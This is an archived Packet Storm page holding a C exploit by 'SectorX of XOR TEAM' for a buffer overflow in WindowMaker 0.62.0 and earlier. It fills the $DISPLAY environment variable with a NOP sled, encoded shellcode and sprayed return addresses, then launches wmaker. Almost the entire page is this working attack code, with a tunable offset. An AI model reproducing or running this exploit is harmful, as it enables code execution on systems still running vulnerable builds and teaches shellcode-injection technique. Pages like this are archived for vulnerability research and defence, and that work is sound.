Windowmaker 0.62.0 buffer overflow exploit - Although wmaker is not suid by default, this code will overflow the $DISPLAY environment variable.
3f08be271096f2c04f704b572c3aff07/*
WindowMaker <= 0.62.0 (and maybe newer) overflow
by SectorX of XOR TEAM
for more information please refer to XOR TEAM's homepage at http://xorteam.cjb.net
note: i supplied the offset 0x4 since it worked for me, but it most likely
wont work for you since my WindowMaker code is modified and self compiled.
if you find an offset on any precompiled binaries please let me know, thanx.
*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90
#define LEN 1004
#define OFFSET 0x4
char shellcode[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
"\xc2\x91";
long get_sp() { __asm__("mov %esp, %eax"); }
int main (int argc, char *argv[])
{
char buffer[LEN];
int i;
long stack = get_sp ();
int offset;
fprintf(stderr, "WindowMaker overflow by SectorX\n\n");
offset = OFFSET;
if (argc > 1)
offset = atoi(argv[1]);
for (i = 0; i < LEN; i += 4)
*(long *) &buffer[i] = stack + offset;
for (i = 0; i < (LEN - strlen (shellcode) - 50); i++)
*(buffer + i) = NOP;
memcpy (buffer + i, shellcode, strlen (shellcode));
printf("Using address 0x%x, offset = 0x%x\n",stack+offset,offset);
printf("Setting environment variable ... ");
setenv("DISPLAY",buffer,1);
printf("done\n\n");
system("/usr/local/bin/wmaker");
return 0;
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!